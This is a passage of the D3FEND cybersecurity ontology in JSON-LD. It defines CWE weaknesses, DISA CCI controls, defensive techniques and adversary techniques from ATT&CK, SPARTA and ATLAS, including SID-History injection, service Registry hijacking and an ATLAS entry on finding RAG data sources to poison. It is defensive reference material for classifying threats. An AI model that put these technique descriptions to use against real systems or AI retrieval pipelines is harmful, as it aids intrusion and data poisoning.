          "@id": "_:Nca4675329777460d9b50052714dd7024"
        }
      ]
    },
    {
      "@id": "_:Nca4675329777460d9b50052714dd7024",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0042"
      }
    },
    {
      "@id": "d3f:NetworkService",
      "@type": "owl:Class",
      "d3f:definition": "In computer networking, a network service is an application running at the network application layer and above, that provides data storage, manipulation, presentation, communication or other capability which is often implemented using a client-server or peer-to-peer architecture based on application layer network protocols. Clients and servers will often have a user interface, and sometimes other hardware associated with it.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Network_service"
      },
      "rdfs:label": "Network Service",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplicationProcess"
      }
    },
    {
      "@id": "d3f:CWE-1114",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1114",
      "d3f:definition": "The source code contains whitespace that is inconsistent across the code or does not follow expected standards for the product.",
      "rdfs:label": "Inappropriate Whitespace Style",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:HTTPHeadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP HEAD method is used to request metadata about the specified resource without the response body.",
      "rdfs:label": "HTTP HEAD Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:AuthorizationLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A log of authorization events.",
      "d3f:records": {
        "@id": "d3f:NetworkResourceAccess"
      },
      "rdfs:label": "Authorization Log",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Authorization"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00155053-n"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLog"
        },
        {
          "@id": "_:N53685ad9e72841939e1dfe4a282c2ed6"
        }
      ]
    },
    {
      "@id": "_:N53685ad9e72841939e1dfe4a282c2ed6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResourceAccess"
      }
    },
    {
      "@id": "d3f:CWE-5",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-5",
      "d3f:definition": "Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted.",
      "rdfs:label": "J2EE Misconfiguration: Data Transmission Without Encryption",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-319"
      }
    },
    {
      "@id": "d3f:T1134.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.005",
      "d3f:definition": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "SID-History Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:N33fea15901204c56b15ac9a470ba5067"
        }
      ]
    },
    {
      "@id": "_:N33fea15901204c56b15ac9a470ba5067",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-582",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-582",
      "d3f:definition": "The product declares an array public, final, and static, which is not sufficient to prevent the array's contents from being modified.",
      "rdfs:label": "Array Declared Public, Final, and Static",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:NetworkNodeInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkNodeInventory"
      ],
      "d3f:d3fend-id": "D3-NNI",
      "d3f:definition": "Network node inventorying identifies and records all the network nodes (hosts, routers, switches, firewalls, etc.) in the organization's architecture.",
      "d3f:inventories": {
        "@id": "d3f:NetworkNode"
      },
      "d3f:kb-article": "## How it works\nAdministrators collect information on network nodes in their architecture using a variety of administrative and management tools that query network devices and nodes for information.  In some cases, where such queries are not supported or provide specific information of interest, an administrator may also collect this information through network enumeration methods to include host discovery and scanning for active ports and services.\n\n## Considerations\n* Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.\n* An adversary conducting network enumeration may engage in activities that parallel normal network node inventorying activities, but would require escalating to admin privileges for most of the operations requiting administrative tools\n\n## Examples\n* Link-layer discovery\n   * Link-layer Discovery Protocol (LLDP)\n   * Cisco Discovery Protocol (CDP)\n* Application-layer discovery\n   * Simple Network Management Protocol (SNMP) collects MIB information\n   * Web-based Enterprise Management (WBEM) collects CIM information\n      * Windows Management Instrumentation (WMI)\n      * Windows Management Infrastructure (MI)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IEEE-802_1AB-2016"
        },
        {
          "@id": "d3f:Reference-QualysNetworkPassiveSensorGettingStartedGuide"
        },
        {
          "@id": "d3f:Reference-RFC3411-AnArchitectureForDescribingSimpleNetworkManagementProtocolSNMPManagementFrameworks"
        },
        {
          "@id": "d3f:Reference-Web-BasedEnterpriseManagement"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Infrastructure"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Instrumentation"
        }
      ],
      "d3f:synonym": [
        "System Discovery",
        "System Inventorying"
      ],
      "rdfs:label": "Network Node Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:Na4b316d403924441a687bc4540da34dc"
        }
      ]
    },
    {
      "@id": "_:Na4b316d403924441a687bc4540da34dc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "d3f:CWE-1043",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1043",
      "d3f:definition": "The product uses a data element that has an excessively large number of sub-elements with non-primitive data types such as structures or aggregated objects.",
      "rdfs:label": "Data Element Aggregating an Excessively Large Number of Non-Primitive Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1093"
      }
    },
    {
      "@id": "d3f:CCI-002307_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals the capability to define or change the value of security attributes available for association with subjects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002307"
    },
    {
      "@id": "d3f:WirelessRouter",
      "@type": "owl:Class",
      "d3f:definition": "A wireless router is a device that performs the functions of a router and also includes the functions of a wireless access point. It is used to provide access to the Internet or a private computer network. Depending on the manufacturer and model, it can function in a wired local area network, in a wireless-only LAN, or in a mixed wired and wireless network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Wireless_router"
      },
      "rdfs:label": "Wireless Router",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Router"
        },
        {
          "@id": "d3f:WirelessAccessPoint"
        }
      ]
    },
    {
      "@id": "d3f:T1520",
      "@type": "owl:Class",
      "d3f:attack-id": "T1520",
      "d3f:definition": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1637.001",
      "rdfs:label": "Domain Generation Algorithms - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1637.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Domain Generation Algorithms"
    },
    {
      "@id": "d3f:T1600.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1600.002",
      "d3f:definition": "Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.",
      "rdfs:label": "Disable Crypto Hardware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1600"
      }
    },
    {
      "@id": "d3f:CCI-002684_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system audits and/or alerts organization-defined personnel when unauthorized network services are detected.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002684"
    },
    {
      "@id": "d3f:CCI-002381_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:Kernel-basedProcessIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization minimizes the number of nonsecurity functions included within the isolation boundary containing security functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002381"
    },
    {
      "@id": "d3f:ReconnaissanceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to gather information they can use to plan future operations.",
      "d3f:enables": {
        "@id": "d3f:TA0043"
      },
      "rdfs:label": "Reconnaissance Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N44407d5758244da7b85cd3460f7c822f"
        }
      ]
    },
    {
      "@id": "_:N44407d5758244da7b85cd3460f7c822f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0043"
      }
    },
    {
      "@id": "d3f:T1521.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1521.002",
      "d3f:definition": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private that should not be distributed. Due to how asymmetric algorithms work, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA.",
      "rdfs:label": "Asymmetric Cryptography - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1521"
      },
      "skos:prefLabel": "Asymmetric Cryptography"
    },
    {
      "@id": "d3f:ExpectedErrorReduction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EER",
      "d3f:definition": "Expected Error Reduction (EER) follows similar ideas as EMC, but again looks at the model output instead of the model itself and also takes the other data into account. In particular, a sample x is considered useful, if we can expect that knowing the label will reduce the future error on unseen samples",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog.  [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Expected Error Reduction",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:OTWatchdogTimer",
      "@type": "owl:Class",
      "d3f:definition": "An OT Watchdog Timer is a software-based monitoring mechanism used in operational technology (OT) environments to continuously supervise the execution and responsiveness of critical control applications, devices, or communication links. It operates by requiring periodic “heartbeat” signals or status updates from monitored processes within a defined time window; if these signals are not received on time (indicating a hang, fault, or abnormal delay) the OT Watchdog Timer automatically triggers predefined safety or recovery actions, such as placing equipment in a fail-safe state, restarting services, generating alarms, or initiating controlled shutdowns.",
      "rdfs:label": "OT Watchdog Timer",
      "rdfs:seeAlso": {
        "@id": "https://literature.rockwellautomation.com/idc/groups/literature/documents/pm/1756-pm005_-en-p.pdf"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTProcessVariable"
        },
        {
          "@id": "d3f:SoftwareWatchdogTimer"
        }
      ]
    },
    {
      "@id": "d3f:T1542.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.004",
      "d3f:definition": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)",
      "d3f:modifies": {
        "@id": "d3f:SystemFirmware"
      },
      "rdfs:label": "ROMMONkit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:N6c2a709b3cc84a6984fb9fcaa65d8671"
        }
      ]
    },
    {
      "@id": "_:N6c2a709b3cc84a6984fb9fcaa65d8671",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:CWE-525",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-525",
      "d3f:definition": "The web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached.",
      "rdfs:label": "Use of Web Browser Cache Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-524"
      }
    },
    {
      "@id": "d3f:corrupts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x corrupts y: The entity x causes y to enter an incorrect, inconsistent, or unintended state by modifying y's information-bearing content (e.g., a bit, symbol, word, configuration cell, or stored parameter) such that y's value no longer matches the expected or previously valid value.",
      "rdfs:label": "corrupts",
      "rdfs:subPropertyOf": {
        "@id": "d3f:impairs"
      }
    },
    {
      "@id": "d3f:CWE-1318",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1318",
      "d3f:definition": "On-chip fabrics or buses either do not support or are not configured to support privilege separation or other security features, such as access control.",
      "rdfs:label": "Missing Support for Security Features in On-chip Fabrics or Buses",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CreateThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:Thread"
      },
      "d3f:definition": "Threads are an execution model that exists independently from a language, as well as a parallel execution model. They enable a program to control multiple different flows of work that overlap in time.",
      "rdfs:label": "Create Thread",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:POSIX_Threads"
        },
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N28bf6a94d54d48298d006d697fb20b63"
        }
      ]
    },
    {
      "@id": "_:N28bf6a94d54d48298d006d697fb20b63",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:OTSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OT Sensor is an industrial-grade sensing device engineered for operational technology (OT) environments (e.g. SCADA, ICS). It measures physical variables—such as pressure, temperature, or flow—under demanding conditions, converting them into reliable signals for real-time monitoring and process control loops.",
      "d3f:may-contain": {
        "@id": "d3f:ClientComputer"
      },
      "d3f:writes": {
        "@id": "d3f:OTProcessVariable"
      },
      "rdfs:comment": "Components of the sensor include a sensing element and may include a power source, display, housing, communication interface or signal processor.",
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.rip/glossary/term/sensor"
      },
      "rdfs:label": "OT Sensor",
      "rdfs:seeAlso": [
        {
          "@id": "https://emerson.com/en-us/catalog/rosemount-sku-3051-coplanar-pressure-transmitter"
        },
        {
          "@id": "https://www.emerson.com/en-us/catalog/rosemount-sku-708-wireless-acoustic-transmitter"
        },
        {
          "@id": "https://www.omega.com/en-us/pressure-measurement/pressure-gauges/c/analog-pressure-gauges"
        },
        {
          "@id": "https://www.vega.com/en-us/products/product-catalog/level/radar"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Sensor"
        },
        {
          "@id": "_:N834437836c554719a917a82a12a6e389"
        },
        {
          "@id": "_:N6bb6b140111f40f59fb2c7e794b6e857"
        }
      ]
    },
    {
      "@id": "_:N834437836c554719a917a82a12a6e389",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ClientComputer"
      }
    },
    {
      "@id": "_:N6bb6b140111f40f59fb2c7e794b6e857",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:writes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProcessVariable"
      }
    },
    {
      "@id": "d3f:CWE-110",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-110",
      "d3f:definition": "Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date.",
      "rdfs:label": "Struts: Validator Without Form Field",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:CWE-1282",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1282",
      "d3f:definition": "Immutable data, such as a first-stage bootloader, device identifiers, and \"write-once\" configuration settings are stored in writable memory that can be re-programmed or updated in the field.",
      "rdfs:label": "Assumed-Immutable Data is Stored in Writable Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:T1496.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1496.002",
      "d3f:definition": "Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.",
      "rdfs:label": "Bandwidth Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:T1496"
      }
    },
    {
      "@id": "d3f:T1185",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1185",
      "d3f:definition": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)",
      "d3f:produces": {
        "@id": "d3f:WebNetworkTraffic"
      },
      "rdfs:label": "Browser Session Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N89346b9b3ee842019c032cab2907a1b2"
        }
      ]
    },
    {
      "@id": "_:N89346b9b3ee842019c032cab2907a1b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-430",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-430",
      "d3f:definition": "The wrong \"handler\" is assigned to process an object.",
      "rdfs:label": "Deployment of Wrong Handler",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:T1608",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608",
      "d3f:definition": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)",
      "rdfs:label": "Stage Capabilities",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:ApplicationRuntimeVariable",
      "@type": "owl:Class",
      "d3f:definition": "A system variable that tracks aspects of runtime of a system.",
      "rdfs:label": "Application Runtime Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:WindowsVirtualFree",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Releases, decommits, or releases and decommits a region of pages within the virtual address space of the calling process.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtFreeVirtualMemory"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree"
      },
      "rdfs:label": "Windows VirtualFree",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIFreeMemory"
        },
        {
          "@id": "_:N84210b8a49ce483e974e9734cabb13ac"
        }
      ]
    },
    {
      "@id": "_:N84210b8a49ce483e974e9734cabb13ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtFreeVirtualMemory"
      }
    },
    {
      "@id": "d3f:reads",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x reads y: The subject x takes the action of reading from a digital source y to acquire data and placing it into volatile memory for processing.",
      "rdfs:label": "reads",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Reading_(computer)"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00629157-v"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:accesses"
      }
    },
    {
      "@id": "d3f:AML.T0064",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0064",
      "d3f:definition": "Adversaries may identify data sources used in retrieval augmented generation (RAG) systems for targeting purposes. By pinpointing these sources, attackers can focus on poisoning or otherwise manipulating the external data repositories the AI relies on.\n\nRAG-indexed data may be identified in public documentation about the system, or by interacting with the system directly and observing any indications of or references to external data sources.",
      "rdfs:label": "Gather RAG-Indexed Targets - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0064"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather RAG-Indexed Targets"
    },
    {
      "@id": "d3f:CCI-002346_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DatabaseQueryStringAnalysis"
        },
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs organization-defined data mining prevention techniques for organization-defined data storage objects to adequately protect against data mining.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002346"
    },
    {
      "@id": "d3f:Reference-CAR-2021-02-001%3AWebshell-IndicativeProcessTree_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-02-001/"
      },
      "d3f:kb-abstract": "A web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gatway in a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-02-001: Webshell-Indicative Process Tree",
      "rdfs:label": "Reference - CAR-2021-02-001: Webshell-Indicative Process Tree - MITRE"
    },
    {
      "@id": "d3f:CCI-002015_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system accepts Personal Identity Verification-I (PIV-I) credentials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002015"
    },
    {
      "@id": "d3f:REC-0005.04",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005.04",
      "d3f:definition": "Active scanning moves beyond passive collection: an adversary transmits or injects probes intended to elicit identifiable responses that reveal frequencies, protocols, or device behavior. Examples include stimulating auto-track or auto-reply beacons, provoking ranging responses, tickling access schemes (TDMA/FDMA bursts), or sending benign-looking frames to observe AGC, saturation, or error counters. Optical/lasercom analogs include alignment pings or modulation patterns that solicit acquisition messages. The objective is RF “banner grabbing”, learning enough to build compatible demod/decoder chains or to map control surfaces, without necessarily breaching authentication. Because scans can resemble normal acquisition attempts, they may blend into the noise floor of operations.",
      "rdfs:label": "Active Scanning (RF/Optical) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0005"
      },
      "skos:prefLabel": "Active Scanning (RF/Optical)"
    },
    {
      "@id": "d3f:T1574.011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.011",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\\SYSTEM\\CurrentControlSet\\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationInitDatabaseRecord"
      },
      "rdfs:label": "Services Registry Permissions Weakness",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:Nfb9fbf9ef0b64d9593a61243c7cf17d4"
        }
      ]
    },
    {
      "@id": "_:Nfb9fbf9ef0b64d9593a61243c7cf17d4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationInitDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-364",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-364",
      "d3f:definition": "The product uses a signal handler that introduces a race condition.",
      "rdfs:label": "Signal Handler Race Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:Non-monotonicLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NML",
      "d3f:definition": "Non-monotonic logic is a formal logic whose conclusion relation is not monotonic. In other words, non-monotonic logics are devised to capture and represent defeasible inferences (cf. defeasible reasoning), i.e., a kind of inference in which reasoners draw tentative conclusions, enabling reasoners to retract their conclusion(s) based on further evidence.",
      "d3f:kb-article": "## References\n1. Non-monotonic logic. (2023, June 1). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Non-monotonic_logic)",
      "rdfs:label": "Non-monotonic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:T0869",
      "@type": "owl:Class",
      "d3f:attack-id": "T0869",
      "d3f:definition": "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port.  Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.",
      "rdfs:label": "Standard Application Layer Protocol - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCommandAndControlTechnique"
      },
      "skos:prefLabel": "Standard Application Layer Protocol"
    },
    {
      "@id": "d3f:AML.T0094",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0094",
